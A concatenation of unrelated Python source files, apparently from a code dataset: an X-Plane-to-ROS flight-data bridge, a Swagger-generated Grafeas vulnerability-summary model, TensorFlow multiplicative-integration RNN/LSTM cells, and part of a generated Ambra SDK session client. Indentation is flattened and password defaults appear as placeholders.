pos = self.client.getPOSI()
# convert data to ros msgs
msg = xplane_msgs.Position()
msg.lat = pos[0]
msg.lon = pos[1]
msg.el = pos[2]
msg.roll = pos[3]
msg.pitch = pos[4]
msg.heading = pos[5]
msg.gear = pos[6]
self.posePub.publish(msg)
def control_update(self):
# get control surfaces information from XPlane
ctrl = self.client.getCTRL()
# convert data to ros msgs
msg = xplane_msgs.Controls()
msg.elevator = ctrl[0]
msg.aileron = ctrl[1]
msg.rudder = ctrl[2]
msg.throttle = ctrl[3]
msg.gear = ctrl[4]
msg.flaps = ctrl[5]
msg.speed_brakes = ctrl[6]
self.controlPub.publish(msg)
def sensor_update2(self):
drefs = []
''' Get sim time to generate timestamp and header for ROS msgs '''
drefs.append("sim/time/total_running_time_sec")
'''Global latitude (1), longitude(2) and elevation(3) datarefs'''
drefs.append("sim/flightmodel/position/latitude")
drefs.append("sim/flightmodel/position/longitude")
drefs.append("sim/flightmodel/position/elevation")
'''Position in local coordinates x(4), y(5), z(6)'''
drefs.append("sim/flightmodel/position/local_x")
drefs.append("sim/flightmodel/position/local_y")
drefs.append("sim/flightmodel/position/local_z")
'''Velocity in local coordinates vx(7), vy(8), vz(9)'''
drefs.append("sim/flightmodel/position/local_vx")
drefs.append("sim/flightmodel/position/local_vy")
drefs.append("sim/flightmodel/position/local_vz")
''' attitude information roll(10), pitch(11), yaw(12)'''
drefs.append("sim/flightmodel/position/phi")
drefs.append("sim/flightmodel/position/theta")
drefs.append("sim/flightmodel/position/psi")
'''Control surface information pitch(13), roll(14), yaw(15), throttle(16), flaps(17), speed brakes(18)'''
drefs.append("sim/joystick/yoke_pitch_ratio")
drefs.append("sim/joystick/yoke_roll_ratio")
drefs.append("sim/joystick/yoke_heading_ratio")
drefs.append("sim/flightmodel/engine/ENGN_thro")
drefs.append("sim/flightmodel/controls/flaprat")
drefs.append("sim/flightmodel/controls/sbrkrat")
''' rotation rate pitch(19), roll(20), yaw(21)'''
drefs.append("sim/flightmodel/position/Q")
drefs.append("sim/flightmodel/position/P")
drefs.append("sim/flightmodel/position/R")
''' Gear (22) '''
drefs.append("sim/aircraft/parts/acf_gear_deploy")
''' Quaternion (23)'''
drefs.append("sim/flightmodel/position/q")
''' alpha (24), beta(25) '''
drefs.append("sim/flightmodel/position/alpha")
drefs.append("sim/flightmodel/position/beta")
'''Wind speed (26) and x(27), y(28),z (29) components in openGL'''
drefs.append("sim/weather/wind_speed_kt")
drefs.append("sim/weather/wind_now_x_msc")
drefs.append("sim/weather/wind_now_y_msc")
drefs.append("sim/weather/wind_now_z_msc")
'''Airspeed (30) and groundspeed (31) '''
drefs.append("sim/flightmodel/position/indicated_airspeed")
drefs.append("sim/flightmodel/position/groundspeed")
''' Reference latitude(32) and longitude(33) '''
drefs.append("sim/flightmodel/position/lat_ref")
drefs.append("sim/flightmodel/position/lon_ref")
''' verticle velocity(34) '''
drefs.append("sim/flightmodel/position/vh_ind")
data = self.client.getDREFs(drefs)
'''For indices refer above where we append the datarefs'''
#print(data[8][0], data[34][0])
#print(data[34][0])
'''Set initial position so that this vector can be subtracted from subsequent local positions (Centre the frame)'''
if (not self.initPose.position.x):
self.initPose.position.x = data[4][0]
self.initPose.position.y = data[5][0]
self.initPose.position.z = data[6][0]
self.opengl_point_to_ned(self.initPose)
self.global_state = xplane_msgs.GlobalState() # Global coordinate information
'''Additional 0 index because the data is in the form of a tuple'''
self.global_state.latitude = data[1][0]
self.global_state.longitude = data[2][0]
self.global_state.elevation = data[3][0]
self.global_state.roll = data[10][0]
self.global_state.pitch = data[11][0]
self.global_state.heading = data[12][0]
self.global_state.gear = data[22][0]
pose = Pose() # position in local coordinates
velocity = Twist() # velocity in local coordinates
odom = Odometry()
'''pose and orientation in openGL coordinates. However, the angle convention is still NED so no change required there'''
pose.position.x = data[4][0]
pose.position.y = data[5][0]
pose.position.z = data[6][0]
pose.orientation.x = data[23][1]
pose.orientation.y = data[23][2]
pose.orientation.z = data[23][3]
pose.orientation.w = data[23][0]
''' Quaternion test '''
# q = quaternion_from_euler(self.global_state.roll * np.pi/180.0, self.global_state.pitch * np.pi/180.0, self.global_state.heading * np.pi/180.0)
# print(q)
# print(pose.orientation)
# print("-----------------------")
''' Current data seems good '''
''' Convert openGL (East Up South) to NED frame & apply translation'''
self.opengl_point_to_ned(pose)
self.shift_point(pose, self.initPose)
'''Although linear velocities must be transformed but it seems like XPlane provides Attitude rates according to conventional NED format'''
velocity.linear.x = data[7][0] # pn_dot
velocity.linear.y = data[8][0] # pe_dot
velocity.linear.z = data[9][0] # pd_dot
velocity.angular.x = data[20][0] # Roll rate
velocity.angular.y = data[19][0] # Pitch rate
velocity.angular.z = data[21][0] # Yaw rate
self.opengl_velocity_to_ned(velocity)
odom.header.frame_id = '/world'
'''TODO : In order to be able to plot on rqt with other data, we should instead use Time.now()'''
odom.header.stamp = rospy.Time(secs=data[0][0])
odom.pose.pose = pose
odom.twist.twist = velocity
self.odom = odom
''' rosplane state '''
state = rosplane_msgs.State()
state = self.get_rosplane_state(data)
# state.header.stamp = rospy.Time(secs=data[0][0])
state.header.stamp = rospy.Time.now()
# state.header.frame_id = "\x01"
state.header.frame_id = "world"
# state.initial_alt = 0.0
# state.initial_lat = 0.0
# state.initial_lon = 0.0
# state.quat_valid = False
# state.quat = [1.0, 0.0, 0.0, 0.0]
# state.chi_deg = 0.0
# state.psi_deg = 0.0
'''Print statements to check if local_vy can be used as vertical velocity indicator
vh_ms = self.client.getDREF("sim/flightmodel/position/vh_ind")[0]
vh_fpm = self.client.getDREF("sim/flightmodel/position/vh_ind_fpm")[0]
print("sensor : %f, %f, %f" % (vh_ms, -velocity.linear.z, vh_fpm*0.3048/60))'''
self.globalStatePub.publish(self.global_state)
self.odomPub.publish(odom)
# self.posePub.publish(pose)
# self.velPub.publish(velocity)
self.statePub.publish(state)
# self.diff_pub.publish(data[5][0] - data[3][0])
'''TODO : local_vx, vy, vz don't seem to give a magnitude equal to airspeed. It could be Vg instead ; investigate this'''
def get_rosplane_state(self, data):
state = rosplane_msgs.State()
state.position[0] = -data[6][0] - self.initPose.position.x
state.position[1] = data[4][0] - self.initPose.position.y
state.position[2] = -data[5][0] - self.initPose.position.z
state.Va = data[30][0] * KNOTS_TO_MS # dataref gives airspeed in knots; need to convert it to m/s
'''Sending angle values in degrees or in rad'''
if angle_in_deg:
state.alpha = data[24][0]
state.beta = data[25][0]
state.phi = data[10][0]
state.theta = data[11][0]
state.psi = data[12][0]
else:
state.alpha = data[24][0] * (np.pi / 180.0)
state.beta = data[25][0] * (np.pi / 180.0)
state.phi = data[10][0] * (np.pi/180)
state.theta = data[11][0] * (np.pi/180)
state.psi = data[12][0] * (np.pi/180)
state.p = data[20][0] * (np.pi/180) # roll rate in rad/s
state.q = data[19][0] * (np.pi/180) # pitch rate in rad/s
state.r = data[21][0] * (np.pi/180) # yaw rate in rad/s
state.Vg = data[31][0] # dataref gives groundspeed in m/s
wind_speed = data[26][0]
'''wn = w * -z_component
we = w * x_component '''
state.wn = wind_speed * (-data[29][0])
state.we = wind_speed * (data[27][0])
# state.wn = 0
# state.we = 0
state.vh = data[8][0] * MS_TO_FPM
'''Print statements to see if speed is in m/s or knots'''
# vx = self.odom.twist.twist.linear.x
# vy = self.odom.twist.twist.linear.y
# vz = self.odom.twist.twist.linear.z
# print("Airspeed Xplane : %f" % (state.Va))
# print("Airpspeed in m/s %f" % (state.Va * 0.51444444444 ))
# print("Self Airspeed : %f" % (np.sqrt(vx*vx + vy*vy + vz*vz)))
# print("Ground velocity : %f" % (state.Vg))
# print("Ground velocity in m/s : %f" % (state.Vg * 0.51444444444 ))
# print("self Groundspeed : %f" % (np.sqrt(vx*vx + vy*vy)))
# print("-------------------------------------")
'''Observations :
grounndspeed dataref infact gives groundspeed in m/s.
But airspeed is in knots.
sqrt(vx*vx + vy*vy + vz*vz) = groundspeed (Shoudl've been equal to airspeed)
airspeed seems slightly off from sqrt(vx*vx + vy*vy + vz*vz) probably because of wind
'''
state.chi = state.psi + state.beta # TODO : calculate course angle ; currently assume wind velocity is 0
if angle_in_deg:
if state.chi > 180.0:
state.chi = state.chi - 2*180.0
if state.chi < -180.0:
state.chi = state.chi + 2*180.0
'''Wrap the course angle between -PI and PI'''
if state.psi > 180.0:
state.psi -= 2*180.0
if state.psi < -180.0:
state.psi += 2*180.0
else:
if state.chi > np.pi:
state.chi = state.chi - 2*np.pi
if state.chi < -np.pi:
state.chi = state.chi + 2*np.pi
'''Wrap the course angle between -PI and PI'''
if state.psi > np.pi:
state.psi -= 2*np.pi
if state.psi < -np.pi:
state.psi += 2*np.pi
return state
def opengl_point_to_ned(self, pose):
''' [pn,pe,pd]^T = [0, 0, -1] [x,y,z]^T
[1, 0, 0 ]
[0, -1, 0] '''
pn = -pose.position.z
pe = pose.position.x
pd = -pose.position.y
pose.position.x = pn
pose.position.y = pe
pose.position.z = pd
def opengl_velocity_to_ned(self, vel):
''' [pn,pe,pd]^T = [0, 0, -1] [x,y,z]^T
[1, 0, 0 ]
[0, -1, 0] '''
pn_dot = -vel.linear.z
pe_dot = vel.linear.x
pd_dot = -vel.linear.y
vel.linear.x = pn_dot
vel.linear.y = pe_dot
vel.linear.z = pd_dot
def shift_point(self, pose, init):
pose.position.x = (pose.position.x - init.position.x)
pose.position.y = (pose.position.y - init.position.y)
pose.position.z = (pose.position.z - init.position.z)
| StarcoderdataPython |
1763626 | <filename>grafeas/models/vulnerability_occurrences_summary_fixable_total_by_digest.py
# coding: utf-8
"""
grafeas.proto
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1beta1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class VulnerabilityOccurrencesSummaryFixableTotalByDigest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'resource': 'V1beta1Resource',
'severity': 'VulnerabilitySeverity',
'fixable_count': 'str',
'total_count': 'str'
}
attribute_map = {
'resource': 'resource',
'severity': 'severity',
'fixable_count': 'fixableCount',
'total_count': 'totalCount'
}
def __init__(self, resource=None, severity=None, fixable_count=None, total_count=None): # noqa: E501
"""VulnerabilityOccurrencesSummaryFixableTotalByDigest - a model defined in Swagger""" # noqa: E501
self._resource = None
self._severity = None
self._fixable_count = None
self._total_count = None
self.discriminator = None
if resource is not None:
self.resource = resource
if severity is not None:
self.severity = severity
if fixable_count is not None:
self.fixable_count = fixable_count
if total_count is not None:
self.total_count = total_count
@property
def resource(self):
"""Gets the resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The affected resource. # noqa: E501
:return: The resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: V1beta1Resource
"""
return self._resource
@resource.setter
def resource(self, resource):
"""Sets the resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The affected resource. # noqa: E501
:param resource: The resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: V1beta1Resource
"""
self._resource = resource
@property
def severity(self):
"""Gets the severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The severity for this count. SEVERITY_UNSPECIFIED indicates total across all severities. # noqa: E501
:return: The severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: VulnerabilitySeverity
"""
return self._severity
@severity.setter
def severity(self, severity):
"""Sets the severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The severity for this count. SEVERITY_UNSPECIFIED indicates total across all severities. # noqa: E501
:param severity: The severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: VulnerabilitySeverity
"""
self._severity = severity
@property
def fixable_count(self):
"""Gets the fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The number of fixable vulnerabilities associated with this resource. # noqa: E501
:return: The fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: str
"""
return self._fixable_count
@fixable_count.setter
def fixable_count(self, fixable_count):
"""Sets the fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The number of fixable vulnerabilities associated with this resource. # noqa: E501
:param fixable_count: The fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: str
"""
self._fixable_count = fixable_count
@property
def total_count(self):
"""Gets the total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The total number of vulnerabilities associated with this resource. # noqa: E501
:return: The total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: str
"""
return self._total_count
@total_count.setter
def total_count(self, total_count):
"""Sets the total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The total number of vulnerabilities associated with this resource. # noqa: E501
:param total_count: The total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: str
"""
self._total_count = total_count
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(VulnerabilityOccurrencesSummaryFixableTotalByDigest, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VulnerabilityOccurrencesSummaryFixableTotalByDigest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| StarcoderdataPython |
3344891 | import tensorflow as tf
from gcg.tf.layers.fullyconnectednn.fully_connected import FullyConnected
##################
### Operations ###
##################
def linear(args, output_size, dtype=tf.float32, scope=None, trainable=True):
with tf.variable_scope(scope or "linear"):
if isinstance(args, list) or isinstance(args, tuple):
if len(args) != 1:
inputs = tf.concat(args, axis=1)
else:
inputs = args[0]
else:
inputs = args
args = [args]
total_arg_size = 0
shapes = [a.get_shape() for a in args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
else:
total_arg_size += shape[1].value
dtype = args[0].dtype
weights = tf.get_variable(
"weights",
[total_arg_size, output_size],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
trainable=trainable
)
output = tf.matmul(inputs, weights)
return output
def multiplicative_integration(
list_of_inputs,
output_size,
initial_bias_value=0.0,
weights_already_calculated=False,
reg_collection=None,
dtype=tf.float32,
scope=None,
trainable=True):
'''
expects len(2) for list of inputs and will perform integrative multiplication
weights_already_calculated will treat the list of inputs as Wx and Uz and is useful for batch normed inputs
'''
with tf.variable_scope(scope or 'double_inputs_multiple_integration'):
if len(list_of_inputs) != 2: raise ValueError('list of inputs must be 2, you have:', len(list_of_inputs))
assert (weights_already_calculated) # TODO
if weights_already_calculated: # if you already have weights you want to insert from batch norm
Wx = list_of_inputs[0]
Uz = list_of_inputs[1]
else:
Wx = linear(
list_of_inputs[0],
output_size,
dtype=dtype,
reg_collection=reg_collection,
scope="Calculate_Wx_mulint",
trainable=trainable
)
Uz = linear(
list_of_inputs[1],
output_size,
dtype=dtype,
reg_collection=reg_collection,
scope="Calculate_Uz_mulint",
trainable=trainable
)
with tf.variable_scope("multiplicative_integration"):
alpha = tf.get_variable(
'mulint_alpha',
[output_size],
dtype=dtype,
initializer=tf.truncated_normal_initializer(
mean=1.0,
stddev=0.1,
dtype=dtype),
trainable=trainable)
beta1, beta2 = tf.split(
tf.get_variable(
'mulint_params_betas',
[output_size * 2],
dtype=dtype,
initializer=tf.truncated_normal_initializer(
mean=0.5,
stddev=0.1,
dtype=dtype),
trainable=trainable),
2,
axis=0)
original_bias = tf.get_variable(
'mulint_original_bias',
[output_size],
dtype=dtype,
initializer=tf.truncated_normal_initializer(
mean=initial_bias_value,
stddev=0.1,
dtype=dtype),
trainable=trainable)
final_output = alpha * Wx * Uz + beta1 * Uz + beta2 * Wx + original_bias
return final_output
def layer_norm(
inputs,
center=True,
scale=True,
reuse=None,
trainable=True,
epsilon=1e-4,
scope=None):
# TODO
# Assumes that inputs is 2D
# add to collections in order to do l2 norm
with tf.variable_scope(
scope,
default_name='LayerNorm',
reuse=reuse):
shape = tf.shape(inputs)
param_shape = (inputs.get_shape()[1],)
dtype = inputs.dtype.base_dtype
beta = tf.zeros((shape[0],))
gamma = tf.ones((shape[0],))
# beta = tf.get_variable(
# 'beta',
# shape=param_shape,
# dtype=dtype,
# initializer=tf.zeros_initializer(),
# trainable=trainable and center)
# gamma = tf.get_variable(
# 'gamma',
# shape=param_shape,
# dtype=dtype,
# initializer=tf.ones_initializer(),
# trainable=trainable and scale)
inputs_T = tf.transpose(inputs)
inputs_T_reshaped = tf.reshape(inputs_T, (shape[1], shape[0], 1, 1))
outputs_T_reshaped, _, _ = tf.nn.fused_batch_norm(
inputs_T_reshaped,
scale=gamma,
offset=beta,
is_training=True,
epsilon=epsilon,
data_format='NCHW')
outputs_reshaped = tf.transpose(outputs_T_reshaped, (1, 0, 2, 3))
outputs = tf.reshape(outputs_reshaped, shape)
return outputs
#############
### Cells ###
#############
class DpRNNCell(tf.nn.rnn_cell.BasicRNNCell):
def __init__(
self,
num_units,
dropout_mask=None,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
weights_scope=None,
trainable=True):
raise NotImplementedError
self._num_units = num_units
self._dropout_mask = dropout_mask
self._activation = activation
self._dtype = dtype
with tf.variable_scope(weights_scope or type(self).__name__):
self._weights = tf.get_variable(
"weights",
[num_inputs + num_units, num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic RNN: output = new_state = tanh(W * input + U * state + B). With same dropout at every time step."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
ins = tf.concat([inputs, state], axis=1)
output = self._activation(tf.matmul(ins, self._weights))
if self._dropout_mask is not None:
output = output * self._dropout_mask
return output, output
class DpMulintRNNCell(DpRNNCell):
def __init__(
self,
num_units,
dropout_mask=None,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
use_layer_norm=False,
weights_scope=None,
trainable=True):
raise NotImplementedError
self._num_units = num_units
self._dropout_mask = dropout_mask
self._activation = activation
self._dtype = dtype
self._use_layer_norm = use_layer_norm
self._trainable = trainable
with tf.variable_scope(weights_scope or type(self).__name__):
self._weights_W = tf.get_variable(
"weights_W",
[num_inputs, num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
self._weights_U = tf.get_variable(
"weights_U",
[num_units, num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic RNN: output = new_state = tanh(W * input + U * state + B)."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
Wx = tf.matmul(inputs, self._weights_W)
Uz = tf.matmul(state, self._weights_U)
if self._use_layer_norm:
Wx = tf.contrib.layers.layer_norm(
Wx,
center=False,
scale=False)
Uz = tf.contrib.layers.layer_norm(
Uz,
center=False,
scale=False)
output = self._activation(
multiplicative_integration(
[Wx, Uz],
self._num_units,
dtype=self._dtype,
weights_already_calculated=True,
trainable=self._trainable))
if self._dropout_mask is not None:
output = output * self._dropout_mask
return output, output
class DpLSTMCell(tf.nn.rnn_cell.BasicLSTMCell):
def __init__(
self,
num_units,
forget_bias=1.0,
dropout_mask=None,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
weights_scope=None,
trainable=True):
raise NotImplementedError
self._num_units = num_units
self._forget_bias = forget_bias
self._dropout_mask = dropout_mask
self._activation = activation
self._dtype = dtype
self._state_is_tuple = True
with tf.variable_scope(weights_scope or type(self).__name__):
self._weights = tf.get_variable(
"weights",
[num_inputs + num_units, 4 * num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic LSTM with same dropout at every time step."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
c, h = state
ins = tf.concat([inputs, h], axis=1)
output = self._activation(tf.matmul(ins, self._weights))
i, j, f, o = tf.split(output, 4, axis=1)
forget = c * tf.nn.sigmoid(f + self._forget_bias)
new = tf.nn.sigmoid(i) * self._activation(j)
new_c = forget + new
# TODO make sure this is correct
if self._dropout_mask is not None:
new_c = new_c * self._dropout_mask
new_h = self._activation(new_c) * tf.nn.sigmoid(o)
new_state = tf.nn.rnn_cell.LSTMStateTuple(new_c, new_h)
return new_h, new_state
class DpMulintLSTMCell(DpLSTMCell):
def __init__(
self,
num_units,
forget_bias=1.0,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
use_layer_norm=False,
weights_scope=None,
trainable=True,
layer_class=FullyConnected,
layer_args={},
**kwargs):
assert (num_inputs is not None)
self._num_units = num_units
self._forget_bias = forget_bias
self._activation = activation
self._dtype = dtype
self._use_layer_norm = use_layer_norm
self._state_is_tuple = True
self._trainable = trainable
self._concrete_dropout_layer = None
with tf.variable_scope(weights_scope or type(self).__name__):
with tf.variable_scope('W'):
self._W_layer_call_func = layer_class(
num_inputs=num_inputs,
num_outputs=4*num_units,
biases_initializer=None,
trainable=trainable,
**layer_args
)
with tf.variable_scope('U'):
self._U_layer_call_func = layer_class(
num_inputs=num_units,
num_outputs=4 * num_units,
biases_initializer=None,
trainable=trainable,
**layer_args
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic RNN: output = new_state = tanh(W * input + U * state + B)."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
c, h = state
Wx = self._W_layer_call_func(inputs)
Uz = self._U_layer_call_func(h)
if self._use_layer_norm:
Wx = tf.contrib.layers.layer_norm(
Wx,
center=False,
scale=False)
Uz = tf.contrib.layers.layer_norm(
Uz,
center=False,
scale=False)
output = self._activation(
multiplicative_integration(
[Wx, Uz],
4 * self._num_units,
dtype=self._dtype,
weights_already_calculated=True,
trainable=self._trainable))
i, j, f, o = tf.split(output, 4, axis=1)
forget = c * tf.nn.sigmoid(f + self._forget_bias)
new = tf.nn.sigmoid(i) * self._activation(j)
new_c = forget + new
if self._concrete_dropout_layer is not None:
new_c = self._concrete_dropout_layer.apply_soft_dropout_mask(new_c)
if self._use_layer_norm:
norm_c = tf.contrib.layers.layer_norm(
new_c,
center=True,
scale=True)
new_h = self._activation(norm_c) * tf.nn.sigmoid(o)
else:
new_h = self._activation(new_c) * tf.nn.sigmoid(o)
new_state = tf.nn.rnn_cell.LSTMStateTuple(new_c, new_h)
return new_h, new_state
| StarcoderdataPython |
51336 | <reponame>agolovkina/sdk-python<filename>ambra_sdk/service/entrypoints/generated/session.py
""" Session.
Do not edit this file by hand.
This is generated by parsing api.html service doc.
"""
from ambra_sdk.exceptions.service import AuthFailed
from ambra_sdk.exceptions.service import BadPassword
from ambra_sdk.exceptions.service import Blocked
from ambra_sdk.exceptions.service import BrandNotAllowed
from ambra_sdk.exceptions.service import Disabled
from ambra_sdk.exceptions.service import Expired
from ambra_sdk.exceptions.service import InvalidCode
from ambra_sdk.exceptions.service import InvalidCredentials
from ambra_sdk.exceptions.service import InvalidPin
from ambra_sdk.exceptions.service import InvalidSid
from ambra_sdk.exceptions.service import InvalidSignature
from ambra_sdk.exceptions.service import InvalidUrl
from ambra_sdk.exceptions.service import InvalidVendor
from ambra_sdk.exceptions.service import Lockout
from ambra_sdk.exceptions.service import MissingFields
from ambra_sdk.exceptions.service import MissingInformation
from ambra_sdk.exceptions.service import NoOauth
from ambra_sdk.exceptions.service import NotFound
from ambra_sdk.exceptions.service import OnlyOne
from ambra_sdk.exceptions.service import OtherOauth
from ambra_sdk.exceptions.service import PasswordReset
from ambra_sdk.exceptions.service import PinExpired
from ambra_sdk.exceptions.service import SsoOnly
from ambra_sdk.exceptions.service import ValidationFailed
from ambra_sdk.exceptions.service import WhitelistLockout
from ambra_sdk.service.query import QueryO
class Session:
"""Session."""
def __init__(self, api):
self._api = api
def login(
self,
login,
account_login=None,
account_name=None,
email=None,
location=None,
new_password=<PASSWORD>,
password=<PASSWORD>,
use_pkey=None,
validate_session=None,
vanity=None,
):
"""Login.
:param login: The user account_login or email address
:param account_login: account_login
:param account_name: account_name
:param email: email
:param location: Login location. (optional)
:param new_password: Change the password or account password to this. (optional)
:param password: password
:param use_pkey: use_pkey
:param validate_session: If you would like to validate an existing session rather than create a new one pass in the sid of the session to valid in this parameter. It will check if the session is still valid and the credentials are for the session. (optional)
:param vanity: The account vanity name. (optional)
"""
request_data = {
'account_login': account_login,
'account_name': account_name,
'email': email,
'location': location,
'login': login,
'new_password': <PASSWORD>,
'password': password,
'use_pkey': use_pkey,
'validate_session': validate_session,
'vanity': vanity,
}
errors_mapping = {}
errors_mapping[('BAD_PASSWORD', None)] = BadPassword('The new_password does not meet the password requirements')
errors_mapping[('BLOCKED', None)] = Blocked('The user is blocked from the system')
errors_mapping[('BRAND_NOT_ALLOWED', None)] = BrandNotAllowed('The user is limited to some brands to login with allowed_login_brands setting')
errors_mapping[('DISABLED', None)] = Disabled('The user is disabled and needs to be /user/enabled to allow access')
errors_mapping[('INVALID_CREDENTIALS', None)] = InvalidCredentials('Invalid user name or password.')
errors_mapping[('LOCKOUT', None)] = Lockout('Too many failed attempts')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('ONLY_ONE', None)] = OnlyOne('You can pass either the password or use_pkey flag, not both')
errors_mapping[('PASSWORD_RESET', None)] = PasswordReset('The password needs to be changed')
errors_mapping[('SSO_ONLY', None)] = SsoOnly('The user can only login via SSO')
errors_mapping[('VALIDATION_FAILED', None)] = ValidationFailed('The session validation failed')
errors_mapping[('WHITELIST_LOCKOUT', None)] = WhitelistLockout('Login blocked by the account whitelist')
query_data = {
'api': self._api,
'url': '/session/login',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def user(
self,
settings=None,
):
"""User.
:param settings: A JSON list of user settings set via /setting/set to return (optional)
"""
request_data = {
'settings': settings,
}
errors_mapping = {}
query_data = {
'api': self._api,
'url': '/session/user',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def permissions(
self,
account_id=None,
namespace_id=None,
):
"""Permissions.
:param account_id: account_id
:param namespace_id: namespace_id
"""
request_data = {
'account_id': account_id,
'namespace_id': namespace_id,
}
errors_mapping = {}
query_data = {
'api': self._api,
'url': '/session/permissions',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def logout(
self,
):
"""Logout.
"""
request_data = {
}
errors_mapping = {}
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The sid was not found')
query_data = {
'api': self._api,
'url': '/session/logout',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def csrf_enable(
self,
redirect_uri,
):
"""Csrf enable.
:param redirect_uri: The URL to redirect to
"""
request_data = {
'redirect_uri': redirect_uri,
}
errors_mapping = {}
errors_mapping[('INVALID_URL', None)] = InvalidUrl('The URL must be a relative URL')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/csrf/enable',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def uuid(
self,
):
"""Uuid.
"""
request_data = {
}
errors_mapping = {}
query_data = {
'api': self._api,
'url': '/session/uuid',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def oauth_start(
self,
):
"""Oauth start.
"""
request_data = {
}
errors_mapping = {}
errors_mapping[('NO_OAUTH', None)] = NoOauth('OAuth is not setup for the associated brand')
query_data = {
'api': self._api,
'url': '/session/oauth/start',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def oauth(
self,
code,
redirect_uri,
vendor,
):
"""Oauth.
:param code: The OAuth code
:param redirect_uri: The redirect_uri used to get the code parameter
:param vendor: The OAuth vendor (doximity|google|brand)
"""
request_data = {
'code': code,
'redirect_uri': redirect_uri,
'vendor': vendor,
}
errors_mapping = {}
errors_mapping[('AUTH_FAILED', None)] = AuthFailed('OAuth failed or a user id was not returned')
errors_mapping[('INVALID_CODE', None)] = InvalidCode('Invalid code')
errors_mapping[('INVALID_VENDOR', None)] = InvalidVendor('Invalid vendor')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
